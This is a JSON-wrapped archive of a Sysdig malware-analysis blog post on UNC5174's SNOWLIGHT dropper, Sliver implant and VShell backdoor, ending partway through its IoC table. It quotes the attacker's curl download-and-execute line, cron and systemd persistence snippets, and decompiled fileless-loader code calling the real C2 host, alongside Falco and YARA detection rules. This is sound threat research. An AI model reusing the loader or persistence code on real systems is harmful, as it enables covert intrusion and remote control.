{
	"id": "8d36d151-5d2e-4bdb-8e1d-75f6360f85dd",
	"created_at": "2026-04-06T01:29:06.903492Z",
	"updated_at": "2026-04-10T03:34:27.971713Z",
	"deleted_at": null,
	"sha1_hash": "4f8f9491935097347510437ef3e902047de95b01",
	"title": "UNC5174’s evolution in China’s ongoing cyber warfare: From SNOWLIGHT to VShell",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1301319,
	"plain_text": "UNC5174’s evolution in China’s ongoing cyber warfare: From\r\nSNOWLIGHT to VShell\r\nBy Alessandra Rizzo\r\nPublished: 2025-04-15 · Archived: 2026-04-06 01:22:07 UTC\r\nPublished:\r\nApril 15, 2025\r\nTable of contents\r\nfalco feeds by sysdig\r\nFalco Feeds extends the power of Falco by giving open source-focused companies\r\naccess to expert-written rules that are continuously updated as new threats are\r\ndiscovered.\r\nhttps://sysdig.com/blog/unc5174-chinese-threat-actor-vshell/\r\nPage 1 of 23\n\nlearn more\r\nAfter a year of operating under the radar, the Sysdig Threat Research Team (TRT) identified a new campaign from\r\nChinese state-sponsored threat actor UNC5174. We found that the threat actor was using a new open source tool\r\nand command and control (C2) infrastructure in late January 2025. We first discovered a malicious bash script\r\nresponsible for downloading multiple executable files for persistence. One of the binaries downloaded is a variant\r\nof UNC5174’s SNOWLIGHT malware, previously identified by Mandiant in a campaign against F5 devices and\r\nrecently mentioned in the French Cyber Threat Overview report released in March 2025 by the French National\r\nAgency for Information Systems Security (ANSSI).\r\nPreviously known for using the open source reverse shell tool SUPERSHELL, UNC5174 has adopted a newly\r\nreleased open source tool called VShell in this campaign. According to its reputation on underground channels,\r\nVShell is considered “even better” than the widely known Cobalt Strike framework. In the 2024 Global Threat\r\nYear-in-Review, we reported that threat actors are increasingly using open source tools in their arsenals for cost-effectiveness and obfuscation to save money and, in this case, plausibly blend in with the pool of non-state-sponsored and often less technical adversaries (e.g., script kiddies), thereby making attribution even more\r\ndifficult. This seems to hold especially true for this particular threat actor, who has been under the radar for the\r\nlast year since being affiliated with the Chinese government. \r\nhttps://sysdig.com/blog/unc5174-chinese-threat-actor-vshell/\r\nPage 2 of 23\n\nThe SNOWLIGHT malware acts as a dropper for a fileless payload that resides solely in memory, called VShell.\r\nVShell is a Remote Access Trojan (RAT) popular among Chinese-speaking cybercriminals in several forums, and\r\nits main developer is also a Chinese speaker. \r\nVShell is not included in a malware dropper by default and is not directly linked to the SNOWLIGHT malware.\r\nThe use of fileless payloads via this specific delivery method has only been attributed to UNC5174. Nearly all of\r\nthis threat actor’s tools are customized and therefore not easily copied by others. The sophistication of the\r\ntechniques we analyzed also aligns with their highly technical capabilities. Based on our analysis and experience\r\nwith this threat actor, we believe that UNC5174’s motivations are espionage and/or selling and brokering access to\r\nthe victims’ environments post-exploitation.\r\nSNOWLIGHT and VShell pose a significant risk to organizations due to their stealthy and sophisticated\r\ntechniques. This is evidenced by the employment of WebSockets for command and control, as well as the fileless\r\nVShell payload we have found. We assess with moderate confidence that this threat actor will continue to provide\r\noccasional support to the Chinese government in the future, using an expanding arsenal of custom and open\r\nsource tools and extensive C2 infrastructure for espionage and access brokering. \r\nSysdig customers and Falco users are protected from the deployment of VShell. The analysis below offers a\r\ntechnical deep dive into our observations.\r\nUNC5174 background\r\nThe threat actor UNC5174 is believed to be a contractor working on behalf of the Chinese government. According\r\nto HivePro and Mandiant, UNC5174 targets Western countries, such as the United States, Canada, and the United\r\nKingdom. The victims in these countries are often research institutions, government organizations, think tanks,\r\nand technology companies. UNC5174 also targets various non-governmental organizations (NGOs) in the Asian-Pacific region and, in some cases, have also targeted businesses within the critical infrastructure sectors of energy,\r\ndefense, and healthcare. \r\nAccording to the 2024 French Cyber Threat Overview report, released in March 2025 by ANSSI, UNC5174\r\nexploited Ivanti’s Cloud Service Appliance (CSA) products during the 2024 Summer Olympics. According to\r\nSOCRadar, this threat actor also leveraged phishing with malicious email attachments to deliver their malware in\r\n2019. We also found evidence that SNOWLIGHT malware is actively targeting MacOS systems, as reported by\r\nObjective-See in their 2024 Malware Recap Report. \r\nAlthough it is unclear what UNC5174 is using for initial access in this campaign, it is targeting Linux-based\r\nsystems. We assess with high confidence that the new infrastructure aligns with domain squatting, likely employed\r\nfor phishing and social engineering. The domains are predominantly impersonating known companies, with the\r\nmost recent instance spoofing Cloudflare. Other recent domains impersonated the messaging app Telegram, the\r\nfinancial service company Huione Pay, and Google.\r\nPrevious campaigns\r\nWhile looking at VirusTotal (VT) tags for the SNOWLIGHT sample, we found that the first sample dropping a\r\nVShell binary in the same fashion we observed with our newest binary was first detected in November 2024.\r\nhttps://sysdig.com/blog/unc5174-chinese-threat-actor-vshell/\r\nPage 3 of 23\n\nSince then, several droppers have been detected, with one of the latest being the dnsloger sample we found for\r\nthis campaign. It is reasonable to assume that this campaign has continued to operate without much public\r\nattention since November 2024.\r\nSNOWLIGHT malware, when executing and downloading in memory, uses the name “[kworker/0:2].” We found\r\nseveral binaries that we believe are associated with a previously unreported UNC5174 campaign while looking for\r\nassociated VShell hashes on VT, using this query:\r\nbehaviour_processes:\"/memfd:a (deleted)/ [kworker/0:2]\"\r\nThis led to the discovery of additional UNC5174 C2 infrastructure from November 2024: googlespays[.]com. The\r\nGoogle brand impersonation matches the pattern of the current C2 domain and includes the parameters needed to\r\nretrieve the VShell binaries.\r\nThe November 2024 VShell binary also uses a WebSocket protocol over the C2 domain apib[.]googlespays[.]com,\r\nthe same attack chain and distinguishable features that we observed with the newest samples and domains.\r\nUNC5174’s new campaign\r\nFollowing initial access, a malicious bash script drops two payloads: dnsloger (associated with SNOWLIGHT\r\nmalware) and system_worker (associated with Sliver and Cobalt Strike).\r\nThis step’s main focus is establishing persistence by dropping a Sliver implant and an in-memory backdoor\r\n(VShell) for further exploitation. \r\nDomain analysis\r\nIn this campaign, we observed new C2 domains:\r\ngooogleasia[.]com (with no affiliation to Google)\r\nhttps://sysdig.com/blog/unc5174-chinese-threat-actor-vshell/\r\nPage 4 of 23\n\nsex666vr[.]com\r\nThese domains have multiple subdomains, some of which have other brand names, such as\r\nlogin[.]microsoftonline[.]gooogleasia[.]com . Domain squatting was likely used for phishing purposes. \r\nWe confidently assess that this campaign is still active at the time of publishing, as new domains listed in the IoCs\r\nsection have been detected as of late March 2025, exhibiting the same modus operandi as detailed below. These\r\ninclude: \r\ntelegrams[.]icu (plausibly impersonating Telegram)\r\nhuionepay[.]me (plausibly impersonating Huione Pay)\r\nc1oudf1are[.]com (plausibly impersonating Cloudflare)\r\nGooogleasia[.]com\r\nThe domain gooogleasia[.]com was created on Sept. 1, 2023, and as of Jan. 16, 2025, it resolved to the IP\r\naddress 34[.]96[.]239[.]183. We resolved this to an IP host name located in Hong Kong for a Google Compute\r\nEngine (GCE) virtual machine. GCE is a computing and hosting service that lets users create and run virtual\r\nmachines on Google infrastructure. During the investigation, we’ve noticed that a new IP started to host\r\ngooogleasia[.]com and its subdomains: 34[.]96[.]252[.]230, changed on February 21, 2025.\r\nWe identified several subdomains used between December 2024 and January 2025 with the most recent,\r\nvs[.]gooogleasia[.]com , using the same IP address.\r\nMalTrail also classifies several subdomains of gooogleasia[.]com as Cobalt Strike C2s.\r\nevil[.]gooogleasia[.]com\r\naccount[.]gooogleasia[.]com\r\nks[.]evil[.]gooogleasia[.]com\r\nbtt[.]evil[.]gooogleasia[.]com\r\nVT community content users identified multiple Sliver C2 servers on the same IP on ports 8888 and 443, which\r\nalso coincides with the use of the system_worker payload, a Sliver implant we found.\r\nSex666vr[.]com\r\nWith regards to the other C2 domain used in this campaign, sex666vr[.]com , it resolves to the IP address\r\n34[.]91[.]68[.]192. We believe that UNC5174 is no longer using this IP for this campaign, as it was last seen in\r\nOctober 2024.\r\nTechnical analysis\r\ndownload_backd.sh\r\nSHA256 Hash: c0838b1211d482d21ccb2c9cc9fb224d1f826474d496a76d21ca18fa2ef92bc1\r\nhttps://sysdig.com/blog/unc5174-chinese-threat-actor-vshell/\r\nPage 5 of 23\n\nThis is the original bash script responsible for downloading and executing the dnsloger and system_worker\r\nbinaries. The shell script contains various functions to verify if the malicious executables dropped correspond to\r\nthe expected MD5 hashes. If they do not, the script attempts to re-download them.\r\n# 2. 若檢查未通過，重新下載和部署\r\necho \"Downloading $executable...\"\r\ncurl -sL \"http://gooogleasia.com:8080/download_$executable\" -o \"/tmp/$executable\"\r\nchmod +x /tmp/$executable\r\nThe script also checks if it’s running as root ( id -u = 0 ). If it is not, it keeps the downloaded executable in\r\n/tmp . When running as root, the script moves the executable to /usr/bin/ , making it more persistent,\r\npotentially harder to remove and plausibly to blend in with other legitimate binaries, as well as making them\r\naccessible system-wide.\r\nif [ \"$(id -u)\"\r\n= \"0\" ]\r\necho \"Running as non-root user, keeping them in /tmp\"\r\nSet the file timestamp to match the target folder\r\ntouch --reference=/usr/bin /tmp/$executable\r\nFor persistence, the script abuses crontab by adding the executables to ensure they run every hour and after\r\nreboots, finally starting them in the background.\r\nAdd the programs to crontab for execution at reboot and every hour\r\necho \"Adding programs to crontab...\"\r\n(crontab -l 2\u003e/dev/null\r\necho \"@reboot /usr/bin/$executable1\"\r\necho \"@reboot /usr/bin/$executable2\"\r\necho \"0 * * * * /tmp/$executable1\"\r\necho \"0 * * * * /tmp/$executable2\")\r\nThe script configures two malicious binaries, dnsloger and system_worker , to run at startup via systemd\r\n(newer systems) or init.d (older systems). Systemctl is used to reload the systemd configuration and finally\r\nstart the malicious services. For systems using init.d , the script uses chkconfig to ensure the service starts on\r\nboot.\r\ncat \u003c\u003cEOF \u003e /etc/systemd/system/$executable.service\r\n[Unit]\r\nDescription=$executable Application Service\r\nhttps://sysdig.com/blog/unc5174-chinese-threat-actor-vshell/\r\nPage 6 of 23\n\nAfter=network.target\r\n[Service]\r\nType=simple\r\nExecStart=/usr/bin/$executable\r\nRestart=always\r\nRestartSec=3600\r\n[Install]\r\nWantedBy=multi-user.target\r\necho \"Setting up systemd service for $executable...\"\r\nretry_with_timeout \"systemctl daemon-reload\"\r\nretry_with_timeout \"systemctl enable $executable.service\"\r\nretry_with_timeout \"systemctl start $executable.service\"\r\nSNOWLIGHT\r\nPayload name: dnsloger\r\nSHA256: e6db3de3a21debce119b16697ea2de5376f685567b284ef2dee32feb8d2d44f8\r\nThe downloaded executable, dnsloger , is detected on VT as part of the SNOWLIGHT malware family used by\r\nUNC5174, as previously reported by HivePro. The malware performs several actions that show a more in-depth\r\nknowledge of Linux internals, persistence, defense evasion, and injection techniques.\r\nAnalyzing the malware with radare2, a free reverse engineering tool, reveals that some parameters and filenames\r\nare hardcoded. For instance, the user-agent, set to User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:48. 0)\r\nGecko/20100101 Firefox/48.0, and the C2 server, vs[.]gooogleasia[.]com.\r\nSNOWLIGHT Extracted Strings\r\nDecompiling the binary with Ghidra results in the following C code:\r\nhttps://sysdig.com/blog/unc5174-chinese-threat-actor-vshell/\r\nPage 7 of 23\n\n{\r\n int iVar1;\r\n in_addr_t iVar2;\r\n int iVar3;\r\n int iVar4;\r\n hostent *phVar5;\r\n ssize_t sVar6;\r\n byte *pbVar7;\r\n long lVar8;\r\n char *pcVar9;\r\n ushort uVar10;\r\n bool bVar11;\r\n byte bVar12;\r\n undefined4 local_1c4c;\r\n char *local_1c48;\r\n undefined8 local_1c40;\r\n sockaddr local_1c38;\r\n char local_1c28 [1024];\r\n char local_1828 [1024];\r\n char local_1428 [1024];\r\n byte local_1028 [4104];\r\n bVar12 = 0;\r\n iVar1 = access(\"/tmp/log_de.log\",0);\r\nhttps://sysdig.com/blog/unc5174-chinese-threat-actor-vshell/\r\nPage 8 of 23\n\nif (iVar1 != 0) {\r\n local_1c38.sa_data[6] = '\\0';\r\n local_1c38.sa_data[7] = '\\0';\r\n local_1c38.sa_data[8] = '\\0';\r\n local_1c38.sa_data[9] = '\\0';\r\n local_1c38.sa_data[10] = '\\0';\r\n local_1c38.sa_data[0xb] = '\\0';\r\n local_1c38.sa_data[0xc] = '\\0';\r\n local_1c38.sa_data[0xd] = '\\0';\r\n local_1c38.sa_family = 2;\r\n local_1c38.sa_data[0] = ' ';\r\n local_1c38.sa_data[1] = -5;\r\n local_1c38.sa_data[2] = '\\0';\r\n local_1c38.sa_data[3] = '\\0';\r\n local_1c38.sa_data[4] = '\\0';\r\n local_1c38.sa_data[5] = '\\0';\r\n phVar5 = gethostbyname(\"vs.gooogleasia.com\");\r\n if (phVar5 == (hostent *)0x0) {\r\n iVar2 = inet_addr(\"vs.gooogleasia.com\");\r\n }\r\n else {\r\n iVar2 = *(in_addr_t *)*phVar5-\u003eh_addr_list;\r\n }\r\n local_1c38.sa_data._2_4_ = iVar2;\r\nhttps://sysdig.com/blog/unc5174-chinese-threat-actor-vshell/\r\nPage 9 of 23\n\niVar1 = socket(2,1,0);\r\n if (-1 \u003c iVar1) {\r\n local_1c4c = 10;\r\n setsockopt(iVar1,6,7,\u0026local_1c4c,4);\r\n while (iVar3 = connect(iVar1,\u0026local_1c38,0x10), iVar3 == - 1) {\r\n sleep(10);\r\n }\r\n uVar10 = (ushort)local_1c38.sa_data._0_2_ \u003e\u003e 8 | local_1c 38.sa_data._0_2_ \u003c\u003c 8;\r\n sprintf(local_1c28,\r\n \"GET /?a=%s\u0026h=%s\u0026t=%s\u0026p=%d HTTP/1.1\\r\\nHost: % s:%d\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv\r\n ,\"l64\",\"vs.gooogleasia.com\",\"ws_\",(uint)uVar10,\"vs.goo ogleasia.com\",(uint)uVar10);\r\n send(iVar1,local_1c28,0x400,0);\r\n pcVar9 = local_1c28;\r\n for (lVar8 = 0x100; lVar8 != 0; lVar8 = lVar8 + -1) {\r\n pcVar9[0] = '\\0';\r\n pcVar9[1] = '\\0';\r\n pcVar9[2] = '\\0';\r\n pcVar9[3] = '\\0';\r\n pcVar9 = pcVar9 + (ulong)bVar12 * -8 + 4;\r\n }\r\n iVar3 = 0;\r\n while( true ) {\r\n sVar6 = recv(iVar1,local_1828,1,0);\r\nhttps://sysdig.com/blog/unc5174-chinese-threat-actor-vshell/\r\nPage 10 of 23\n\nif (((int)sVar6 \u003c 1) ||\r\n ((((bVar11 = local_1828[0] == '\\n', local_1828[iVar3] = l ocal_1828[0], bVar11 \u0026\u0026\r\n (local_1828[iVar3 + -1] == '\\r')) \u0026\u0026 (local_1828[iVar3 + -2] == '\\n')) \u0026\u0026\r\n (local_1828[iVar3 + -3] == '\\r')))) break;\r\n iVar3 = iVar3 + (int)sVar6;\r\n }\r\n lVar8 = syscall(0x13f,\u0026DAT_00400e50,1); // Sysdig: memfd_create\r\n iVar3 = (int)lVar8;\r\n if (-1 \u003c iVar3) {\r\n while( true ) {\r\n sVar6 = recv(iVar1,local_1028,0x1000,0);\r\n iVar4 = (int)sVar6;\r\n pbVar7 = local_1028;\r\n if (iVar4 \u003c 1) break;\r\n do {\r\n *pbVar7 = *pbVar7 ^ 0x99;\r\n pbVar7 = pbVar7 + 1;\r\n } while ((int)pbVar7 - (int)local_1028 \u003c iVar4);\r\n write(iVar3,local_1028,(long)iVar4);\r\n }\r\n for (lVar8 = 0x400; lVar8 != 0; lVar8 = lVar8 + -1) {\r\n pbVar7[0] = 0;\r\n pbVar7[1] = 0;\r\n pbVar7[2] = 0;\r\nhttps://sysdig.com/blog/unc5174-chinese-threat-actor-vshell/\r\nPage 11 of 23\n\npbVar7[3] = 0;\r\n pbVar7 = pbVar7 + (ulong)bVar12 * -8 + 4;\r\n }\r\n close(iVar1);\r\n realpath((char *)*param_2,local_1428);\r\n setenv(\"CWD\",local_1428,1);\r\n local_1c48 = \"[kworker/0:2]\";\r\n local_1c40 = 0;\r\n fexecve(iVar3,\u0026local_1c48,environ);\r\n close(iVar1);\r\n }\r\n }\r\n return 0;\r\n }\r\n /* WARNING: Subroutine does not return */\r\n exit(0);\r\n}\r\nThe code first checks for the presence of a log file ( /tmp/log_de.log ). If it doesn’t exist, it proceeds to set up a\r\nsocket for network communication, aiming to connect to a remote server. It then attempts to resolve and connect\r\nto vs[.]gooogleasia[.]com , sending an HTTP GET request with specific query parameters, such as the\r\nhardcoded user agent. \r\nSNOWLIGHT malware attempts to receive data over the network through the recvfrom syscall, which is a\r\nsystem call that reads data from a socket, typically for UDP or TCP communication. It is commonly used by\r\napplications that need to receive messages over a network, like network servers or clients. In the context of this\r\nattack chain, the recvfrom syscall may be set up in order to receive further payloads or communication with the\r\nC2 server.\r\nhttps://sysdig.com/blog/unc5174-chinese-threat-actor-vshell/\r\nPage 12 of 23\n\nThe malware then waits to receive data from the server and XORs the data with 0x99, suggesting an attempt to\r\nobfuscate or encrypt the content before processing it. Finally, it uses system functions to manipulate environment\r\nvariables, such as setting the current working directory to the environment variable “CWD.”\r\nSliver\r\nPayload name: system_worker\r\nSHA-256: 21ccb25887eae8b17349cefc04394dc3ad75c289768d7ba61f51d228b4c964db\r\nThe downloaded executable system_worker was categorized as Sliver malware on VT as of Jan. 19, 2025. It is\r\nboth UPX-packed and obfuscated with gobfuscate. We deobfuscated it using the “ degobfuscate.py ” plugin for\r\nGhidra, available on GitHub, and confirmed the unpacked binaries’ functions were the same as those found in the\r\nSliver Go package.\r\nDeobfuscated strings\r\nhttps://sysdig.com/blog/unc5174-chinese-threat-actor-vshell/\r\nPage 13 of 23\n\nSliver functions\r\nA Sliver implant is a piece of malware used in C2 operations to give an attacker remote control over a\r\ncompromised system. Once deployed on a target machine, the implant serves as the attacker’s foothold, allowing\r\nthem to execute malicious actions, gather information, and/or control the infected system remotely.\r\nAnalyzing the runtime behavior of system_worker logs showed that this binary reaches out to multiple C2\r\nsubdomains hosted at sex666vr[.]com , as shown below:\r\n2595 16:18:10.087506663 1 vt_21ccb25887ea (12080.12080) \u003c read res=62 data=.*...........mtls.sex666vr.com.....\r\n10051 16:19:10.356965588 1 vt_21ccb25887ea (12080.12090) \u003c read res=112 data=.P...........wg.gooogleasia.com....\r\n34257 16:22:17.391257404 1 vt_21ccb25887ea (12080.12099) \u003c write res=47 data=A............https.sex666vr.com....\r\nMore specifically, the binary uses secure communication channels typical of Sliver implants, including mutual\r\nTLS (mTLS), WireGuard, and HTTPS. These protocols can be seen in the subdomains mentioned. \r\nVShell\r\nName: Fileless (memfd)\r\nSHA256: 8d88944149ea1477bd7ba0a07be3a4371ba958d4a47b783f7c10cbe08c5e7d38\r\nThe dnsloger (SNOWLIGHT) binary downloads the VShell binary through a carefully crafted GET request to\r\nthe C2 server. This is visible from the sendto syscall log below:\r\nhttps://sysdig.com/blog/unc5174-chinese-threat-actor-vshell/\r\nPage 14 of 23\n\n2011 16:09:00.720663842 1 vt_e6db3de3a21d (12202.12202) \u003c sendto res=1024 data=GET /?a=l64\u0026h=vs.gooogleasia.com\r\nVShell is a backdoor used to remotely access and control compromised systems. This binary became available in\r\n2024 on GitHub, published by the user “veo” in the “vshell” repository. It is created through the memfd_create\r\n(syscall 0x13f) by its dropper, SNOWLIGHT, in this campaign. This is a hallmark of fileless malware, where the\r\nmalicious code resides entirely in memory and doesn’t touch the disk, making detection via traditional file-based\r\nscanning methods difficult. \r\n2377 16:09:00.923728239 1 vt_e6db3de3a21d (12202.12202) \u003c memfd_create fd=4(\u003cm\u003ea) name=a flags=1(MFD_CLOEXEC)\r\nIt is disguised as a system process ([ kworker/0:2 ]) and executed through fexecve syscall, as shown in the\r\ndecompiled code of the SNOWLIGHT section above. This syscall allows the execution of a binary that has been\r\nopened as a file descriptor. Instead of supplying a file path, providing an open file descriptor to fexecve() will\r\nexecute the program from memory. It also passes down all environment variables accessible to the current process.\r\nfexecve(iVar3, \u0026local_1c48, environ);\r\nThe binary is obfuscated with Gobfuscate, and has the typical .exe name associated with a fileless binary,\r\nprefixed by “ memfd .” At its creation, the filename chosen is “ a ” and later changed to “ kworker ” to blend in\r\nwith legitimate kernel processes.\r\nBackground\r\nAccording to this article, the original developer of VShell decided to completely delete the release for legal\r\nreasons, but it is still circulating on the Internet. Additionally, because the license has expired, it is technically no\r\nlonger legally usable. Nevertheless, the article links to a way of configuring VShell by bypassing the license\r\nexpiration.\r\nVShell Config File\r\nSearching for the full Chinese VShell title online reveals downloadable zip archives containing the binary from\r\nthird-party file-sharing websites, as seen below:\r\nhttps://sysdig.com/blog/unc5174-chinese-threat-actor-vshell/\r\nPage 15 of 23\n\nThird-party link to download VShell client\r\nThere are also, of course, a number of clone repositories on GitHub that still contain VShell and documentation on\r\nhow to use it.\r\nSnapshot of VShell clone GitHub repository\r\nVShell has been misused for malicious activities since its release, primarily for remote access and C2 purposes. It\r\nacts as a RAT (Remote Access Trojan), allowing its abusers to execute arbitrary commands and download or\r\nupload files.\r\nAccording to the possible use cases we researched for this malware, the client for VShell is downloadable from\r\nthe C2, according to the targeted system. The payload names available for further download through the VShell\r\nconsole correspond to the ones we were able to retrieve from our research, such as linux_i386 .\r\nhttps://sysdig.com/blog/unc5174-chinese-threat-actor-vshell/\r\nPage 16 of 23\n\nVShell Payload Generator\r\nFrom the picture above, it’s possible to see that the various payloads are capable of injecting shellcode and\r\nmalicious binaries for Linux, Windows, and macOS on an infected machine that is connected to the VShell main\r\nconsole. The malware also supports the upload and download of files from the compromised machines.\r\nMemory manipulation\r\nOnce executed, VShell carries out a series of suspicious memory manipulation operations on the system. It\r\nperforms multiple memory mappings (mmap and mmap2 system calls), with fd=-1 (indicating no file\r\ndescriptor) combined with flags like MAP_PRIVATE | MAP_ANONYMOUS . This suggests that the process is allocating\r\nmemory without associating it with any files.\r\nThe process is repeatedly allocating large, seemingly random blocks of memory. Some of these mappings are huge\r\n(e.g., 64MB, 128MB, 512MB) and are allocated with PROT_NONE protection, which means the memory cannot\r\nbe accessed (read/write). This “blank” memory could later be changed to allow executable access ( PROT_EXEC ), a\r\nbehavior commonly seen in fileless malware. Given that further payloads can be sent by the attacker’s C2, it’s\r\nreasonable to think that these inaccessible memory regions are mapped in preparation of such additional payloads.\r\nWe found an article on how to compress and reduce the size of the payloads and shellcodes downloaded by VShell\r\nas they can be suspiciously large, reducing them from 20MB to 1 KB shellcode.\r\nhttps://sysdig.com/blog/unc5174-chinese-threat-actor-vshell/\r\nPage 17 of 23\n\nCommand and control\r\nThe presence of the Upgrade: websocket and Connection: Upgrade headers in the write data shows that the\r\nprocess is attempting to upgrade from an HTTP connection to a WebSocket connection to the server at\r\nvs[.]gooogleasia[.]com on port 8443. WebSockets provide a two-way communication channel over a single\r\nTCP connection and use less overhead for file uploads and downloads since it is real time.\r\n11949 16:09:03.107155929 1 4 (12202.12202) \u003c write res=163 data=GET /w HTTP/1.1..Host: vs.gooogleasia.com:8443\r\n11963 16:09:03.297903241 1 4 (12202.12202) \u003c read res=129 data=HTTP/1.1 101 Switching Protocols..Upgrade: websoc\r\n12437 16:09:04.387602087 1 4 (12202.12213) \u003c write res=163 data=GET /w HTTP/1.1..Host: vs.gooogleasia.com:8443..\r\n12515 16:09:04.576754849 1 4 (12202.12213) \u003c read res=129 data=HTTP/1.1 101 Switching Protocols..Upgrade: websoc\r\n12871 16:09:05.345517369 1 4 (12202.12213) \u003c write res=163 data=GET /w HTTP/1.1..Host: vs.gooogleasia.com:8443..\r\n12939 16:09:05.536259167 0 4 (12202.12202) \u003c read res=129 data=HTTP/1.1 101 Switching Protocols..Upgrade: websoc\r\nThe choice of WebSockets for C2 is not new, but it is not a typical choice for malware either. Over the years, there\r\nhave been a few reports documenting malware that uses WebSockets for C2 communications, such as\r\nPY#RATION. WebSocket C2s are more tedious for attackers to configure compared with standard methods, and\r\nthey typically run on port 80 or 443. \r\nIn this case, the attackers have configured VShell to run on the HTTPS port (8443). This is significant because\r\nHTTPS traffic is encrypted. Our runtime capture confirms that, except for a few random words, we found nothing\r\nof note in the network traffic once the connection was upgraded to a WebSocket. \r\nGiven that the infected hosts are managed through a UI (as shown below), it is likely that UNC5174 prefers\r\nWebSockets because the payloads can be sent to the compromised machine in real-time and over encrypted traffic.\r\nThere have been a few reports over the years of antivirus solutions missing malware C2 communication over\r\nWebSockets, so it is also possible that the threat actor is trying to use a less common C2 channel for defense\r\nevasion purposes.\r\nhttps://sysdig.com/blog/unc5174-chinese-threat-actor-vshell/\r\nPage 18 of 23\n\nVShell Console UI\r\nThe choice of WebSocket does not seem common to all VShell binaries we have analyzed, which encompassed\r\nseveral protocols (TCP and UDP predominantly). To the best of our knowledge, the usage of WebSockets for\r\nVShell is a distinguishing feature of this campaign, as well as its dropper, SNOWLIGHT.\r\nConclusion\r\nThis campaign highlights a new development for the Chinese state-sponsored threat actor UNC5174. As first\r\nreported by Mandiant, SNOWLIGHT is a custom dropper that is used to gain a foothold in the compromised\r\nenvironment for further exploitation, likely involving espionage and reselling access. This new campaign sees the\r\nemployment of VShell, a popular open source Chinese RAT, make its way into the threat actor’s toolset. \r\nSNOWLIGHT and VShell pose a significant risk to organizations as the analyzed techniques and methods\r\nemployed, such as the employment of WebSockets and the usage of a fileless VShell payload, denote a higher\r\nlevel of technical knowledge. The lack of public documentation on VShell being employed by this threat actor is\r\ntelling, as the evidence we have gathered shows that this campaign has been active since at least November 2024.\r\nWe assess with moderate confidence that this threat actor will continue to support the Chinese government and\r\nexpand its arsenal with the intent of gaining access to organizations located in countries of interest. UNC5174 will\r\nalso likely continue to employ stealthy techniques to minimize detection and alerting, including the use of fileless\r\npayloads with new tools and quickly changing network infrastructure.\r\nUNC5174’s campaign detection\r\nSysdig customers are protected from the deployment of VShell with the following rules.\r\nFalco users can apply the rules below to detect the VShell threat.\r\nFalco\r\nSysdig Runtime Threat Detection\r\nDetects VShell execution by its parent (SNOWLIGHT).\r\nhttps://sysdig.com/blog/unc5174-chinese-threat-actor-vshell/\r\nPage 19 of 23\n\n- rule: Fileless Malware Detected (memfd)\r\n desc: This rule detects the loading and execution of a fileless ELF malware, indicating potential memory-based\r\n condition: spawned_process and proc.is_exe_from_memfd=true and evt.arg.flags contains \"EXE_FROM_MEMFD\" and pro\r\n output: An ELF %proc.exe was loaded and executed in memory on %container.name and parent %proc.pname under us\r\n priority: CRITICAL\r\nSysdig Runtime Threat Detection\r\nDetects VShell preparation stage before downloading further payloads from the C2, in memory.\r\n- rule: Memory Manipulation by Fileless Program\r\n desc: Detects the allocation of large, anonymous unused memory regions (64 MB or more) by a process, where the\r\n condition: (evt.type in (mmap,mmap2) and evt.dir = \u003e and evt.rawarg.length \u003e= 67108864 and evt.arg.flags conta\r\n output: Fileless process %proc.exe allocated a large amount of memory %evt.arg.length on %container.name under\r\n tags: [host, container]\r\n priority: CRITICAL\r\nYARA\r\nSysdig customers can also take advantage of the following YARA rule to detect the SNOWLIGHT threat.\r\nrule SNOWLIGHT_DROPPER_SYSDIG\r\n{\r\n meta:\r\n author = \"Alessandra Rizzo\"\r\n description = \"This rule detects strings seen in SNOWLIGHT malware acting as a dropper for filel\r\n md5 = \"96f307b0ba3bb11715fab5db8d61191f\"\r\n platforms = \"Linux\"\r\n malware_family = \"SNOWLIGHT\"\r\nhttps://sysdig.com/blog/unc5174-chinese-threat-actor-vshell/\r\nPage 20 of 23\n\nstrings:\r\n $http_get_request = { 77 73 5f 00 6c 36 34 00 47 45 54 20 2f 3f 61 3d 25 73 26 68 3d 25 73 26 74\r\n $user_agent = { 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 6f 7a 69 6c 6c 61 2f 35 2e 30 20 28 57 69\r\n $fileless_payload_masked_name = { 5b 6b 77 6f 72 6b 65 72 2f 30 3a 32 }\r\n condition:\r\n uint32(0) == 0x464c457f and all of them\r\n}\r\nIoCs\r\nIoC\r\nType\r\nIoC Note\r\nDomain vs[.]gooogleasia[.]com VShell Console\r\nIP\r\nAddress\r\n34[.]96[.]239[.]183 C2 Address\r\nIP\r\nAddress\r\n8[.]219[.]171[.]47 C2 Address\r\nDomain apib[.]googlespays[.]com\r\nSNOWLIGHT\r\nDropper Domain\r\n(November 2024)\r\nIP\r\nAddress\r\n188[.]114[.]97[.]3 C2 Address\r\nURL\r\nhttp://vs[.]gooogleasia[.]com:8443/?\r\na=l64\u0026h=vs.gooogleasia.com\u0026t=ws_\u0026p=8443\r\nVShell Payload\r\nDownloader\r\nSHA256 e6db3de3a21debce119b16697ea2de5376f685567b284ef2dee32feb8d2d44f8 SNOWLIGHT\r\nSHA256 8d88944149ea1477bd7ba0a07be3a4371ba958d4a47b783f7c10cbe08c5e7d38 VShell\r\nSHA256 21ccb25887eae8b17349cefc04394dc3ad75c289768d7ba61f51d228b4c964db Sliver Implant\r\nDomain sex666vr[.]com C2 Domain\r\nIP\r\nAddress\r\n34[.]55[.]187[.]149 C2 Address\r\nhttps://sysdig.com/blog/unc5174-chinese-threat-actor-vshell/\r\nPage 21 of 23\n\nURL http://ciscocdn[.]com:8888/supershell/compile/download/x64\r\nSuperShell\r\nDownloader,\r\npossibly part of a\r\nprevious\r\ncampaign\r\nURL http://www[.]bing-server[.]com:443\r\nURL possibly part\r\nof a previous\r\ncampaign\r\nSHA56 6579defcd1326efad359c59cfe9a76d7df375e54f6e977dd880d10f81325999e \r\nSNOWLIGHT\r\n(November 2024\r\nCampaign)\r\nSHA256 f064fdd24c56f2d20f1a6a32fc7edbd3848f962b25965b788b0dc725eeab9db4\r\nVShell\r\n(November 2024\r\nCampaign)\r\nDomain evil[.]gooogleasia[.]com\r\nIdentified\r\nsubdomain\r\nDomain account[.]gooogleasia[.]com\r\nIdentified\r\nsubdomain\r\nDomain ks[.]evil[.]gooogleasia[.]com\r\nIdentified\r\nsubdomain\r\nDomain 